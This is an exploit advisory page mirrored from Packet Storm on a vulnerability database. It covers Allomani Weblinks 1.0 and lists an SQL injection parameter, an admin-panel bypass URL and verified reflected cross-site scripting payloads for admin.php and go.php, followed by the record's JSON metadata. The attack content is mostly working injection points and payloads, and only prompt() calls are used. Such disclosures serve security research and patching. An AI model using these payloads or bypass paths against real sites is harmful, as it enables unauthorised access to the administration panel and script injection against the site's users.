Search...

Allomani Weblinks 1.0 Cross Site Scripting / SQL Injection

2014-10-05T00:00:00

ID PACKETSTORM:128565
Type packetstorm
Reporter indoushka
Modified 2014-10-05T00:00:00

Description

                                        
                                            `Allomani Weblinks v1.0 Multi Vulnerability  
=====================================  
Author : indoushka  
Vondor : http://www.allomani.com/  
Dork : جميع الحقوق محفوظة لـ : اللوماني © 2014  
برمجة اللوماني للخدمات البرمجية © 2006   
======================================  
  
Sql injection :  
  
http://127.0.0.1/public_html/index.php?action=browse&cat=1 (inject her)  
  
cpanel : http://127.0.0.1/public_html/admin.php  
  
By Pass :  
  
http://127.0.0.1/public_html/admin_menu.html  
  
Cross site scripting (verified) :  
  
Affected items  
/public_html/admin.php   
/public_html/go.php   
  
URI was set to "onmouseover='prompt(929220)'bad="&gt;  
The input is reflected inside a tag parameter between double quotes.  
URL encoded GET input id was set to 12'"()&%&lt;ScRiPt &gt;prompt(983476)&lt;/ScRiPt&gt;  
  
`

JSON Vulners Source

Initial Source

{"sourceHref": "https://packetstormsecurity.com/files/download/128565/allomaniweblinks-sql.txt", "sourceData": "`\ufeffAllomani Weblinks v1.0 Multi Vulnerability \n===================================== \nAuthor : indoushka \nVondor : http://www.allomani.com/ \nDork : \u062c\u0645\u064a\u0639 \u0627\u0644\u062d\u0642\u0648\u0642 \u0645\u062d\u0641\u0648\u0638\u0629 \u0644\u0640 : \u0627\u0644\u0644\u0648\u0645\u0627\u0646\u064a \u00a9 2014 \n\u0628\u0631\u0645\u062c\u0629 \u0627\u0644\u0644\u0648\u0645\u0627\u0646\u064a \u0644\u0644\u062e\u062f\u0645\u0627\u062a \u0627\u0644\u0628\u0631\u0645\u062c\u064a\u0629 \u00a9 2006 \n====================================== \n \nSql injection : \n \nhttp://127.0.0.1/public_html/index.php?action=browse&cat=1 (inject her) \n \ncpanel : http://127.0.0.1/public_html/admin.php \n \nBy Pass : \n \nhttp://127.0.0.1/public_html/admin_menu.html \n \nCross site scripting (verified) : \n \nAffected items \n/public_html/admin.php \n/public_html/go.php \n \nURI was set to \"onmouseover='prompt(929220)'bad=\"> \nThe input is reflected inside a tag parameter between double quotes. \nURL encoded GET input id was set to 12'\"()&%<ScRiPt >prompt(983476)</ScRiPt> \n \n`\n", "edition": 1, "references": [], "modified": "2014-10-05T00:00:00", "hash": "c5de0184cac4942ccc2fe7ce436c646a25025d56b9fe63519b7689b25c155ee2", "cvelist": [], "history": [], "bulletinFamily": "exploit", "href": "https://packetstormsecurity.com/files/128565/Allomani-Weblinks-1.0-Cross-Site-Scripting-SQL-Injection.html", "description": "", "id": "PACKETSTORM:128565", "reporter": "indoushka", "lastseen": "2016-11-03T10:17:10", "published": "2014-10-05T00:00:00", "enchantments": {"score": {"value": 4.3, "vector": "NONE"}, "vulnersScore": 4.3}, "objectVersion": "1.2", "type": "packetstorm", "cvss": {"vector": "NONE", "score": 0.0}, "title": "Allomani Weblinks 1.0 Cross Site Scripting / SQL Injection", "viewCount": 0, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "d4be9c4fc84262b4f39f89565918568f", "key": "cvss"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "description"}, {"hash": "88a808035916fe817054ec30e2c6f9ec", "key": "href"}, {"hash": "369b9f608451f47f7fe57a45258cfd0c", "key": "modified"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "369b9f608451f47f7fe57a45258cfd0c", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "841169f23cc6417d1cc9372dea976fab", "key": "reporter"}, {"hash": "bb18a20c8488345c3411319de29865ce", "key": "sourceData"}, {"hash": "286d4def4d5d831c77859b5e7b203aac", "key": "sourceHref"}, {"hash": "a67946cf05f80b1582bede5b6010d649", "key": "title"}, {"hash": "6466ca3735f647eeaed965d9e71bd35d", "key": "type"}]}